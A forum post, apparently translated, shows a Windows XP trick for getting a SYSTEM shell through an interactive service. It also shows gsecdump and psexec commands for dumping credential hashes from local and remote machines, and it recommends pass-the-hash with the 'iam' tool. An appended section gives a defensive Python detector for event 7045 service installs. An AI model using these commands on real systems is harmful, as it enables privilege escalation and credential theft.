To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely.
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
A tip: you can use iam from the pshtools toolkit to inject the hash information just grabbed with gsecdump into the local lsass process and carry out a hash-injection (pass-the-hash) attack. The foreigners really are the strong ones here; administrators are going to have their hands full now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, actually never need to be cracked at all; it is purely a matter of using the tool. As the original article puts it well, whether the password is 4 characters or 127, once you have the hash it is 100% done.

Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
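The service trick at the top of the post leaves a clear trace for defenders: every `sc create` that is followed by a start lands in the System log as event 7045 ("A service was installed in the system"), with the ImagePath, service type, start type and account recorded. The following is an added defensive example, not code from the forum post or from gsecdump/PsExec. It scans a constructed, pipe-delimited flattening of 7045 records (the field names follow the real event; the one-record-per-line layout is an assumption made for this example) and flags installs whose ImagePath is an interpreter such as cmd.exe, plus the PSEXESVC helper service that PsExec installs when run with `-s`.

```python
"""Flag 7045 service-install records that look like the 'sc create ... cmd.exe' trick.

Added defensive example, not code from the forum post or from gsecdump/PsExec.
The input is a constructed pipe-delimited flattening of Windows System-log
event 7045 records; the field set (ServiceName, ImagePath, ServiceType,
StartType, AccountName) follows that event, but the line format is an
assumption made for this example, not a real export format.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Interpreters that a legitimate service almost never uses as its ImagePath.
SHELL_BINARIES = {"cmd.exe", "powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe"}
# PsExec with -s (as in the post) installs its helper under this service name.
REMOTE_EXEC_SERVICES = {"psexesvc"}


@dataclass
class ServiceInstall:
    service_name: str
    image_path: str
    service_type: str
    start_type: str
    account_name: str


def parse_7045_line(line: str) -> Optional[ServiceInstall]:
    """Parse 'EventID|ServiceName|ImagePath|ServiceType|StartType|AccountName' (constructed format)."""
    parts = line.rstrip("\r\n").split("|")
    if len(parts) != 6 or parts[0] != "7045":
        return None
    return ServiceInstall(*parts[1:])


def image_binary(image_path: str) -> str:
    """Return the lower-cased file name of the executable named in an ImagePath.

    Handles both a quoted path with arguments ('"C:\\Program Files\\x.exe" --svc')
    and an unquoted one ('C:\\WINDOWS\\system32\\cmd.exe /K start').
    """
    p = image_path.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        exe = p[1:end] if end > 0 else p[1:]
    else:
        exe = p.split(" ", 1)[0]
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_reasons(ev: ServiceInstall) -> List[str]:
    """Reasons (possibly none) that this service install deserves a look."""
    reasons = []
    binary = image_binary(ev.image_path)
    if binary in SHELL_BINARIES:
        reasons.append(f"ImagePath launches an interpreter ({binary}) instead of a service binary")
    if ev.service_name.lower() in REMOTE_EXEC_SERVICES:
        reasons.append(f"service name matches a remote-execution helper ({ev.service_name})")
    # The account is context only: LocalSystem on its own is normal for services,
    # but it raises the stakes for anything already flagged (the post's whoami result).
    if reasons and ev.account_name.lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    return reasons


def find_suspicious(lines) -> List[Tuple[str, List[str]]]:
    """Return (service name, reasons) for every flagged 7045 record in `lines`."""
    hits = []
    for line in lines:
        ev = parse_7045_line(line)
        if ev is None:
            continue
        reasons = suspicious_reasons(ev)
        if reasons:
            hits.append((ev.service_name, reasons))
    return hits


# Constructed sample records: the post's shellcmdline service, PsExec's helper,
# and two ordinary services that must not be flagged.
SAMPLE_7045 = r"""7045|shellcmdline|C:\WINDOWS\system32\cmd.exe /K start|user mode service|demand start|LocalSystem
7045|PSEXESVC|%SystemRoot%\PSEXESVC.exe|user mode service|demand start|LocalSystem
7045|Spooler|C:\WINDOWS\system32\spoolsv.exe|user mode service|auto start|LocalSystem
7045|UpdaterSvc|"C:\Program Files\Vendor\updater.exe" --service|user mode service|auto start|NT AUTHORITY\LocalService
"""

if __name__ == "__main__":
    for name, why in find_suspicious(SAMPLE_7045.splitlines()):
        print(f"{name}: {'; '.join(why)}")
```

Run as-is it reports the shellcmdline and PSEXESVC records and stays silent on Spooler and the quoted-path updater. In practice the same two checks are worth applying to the raw event stream, and the failed `sc start` in the post is a reminder that the 7045 record is written even when the service then times out with error 1053, so the install itself is the signal to alert on.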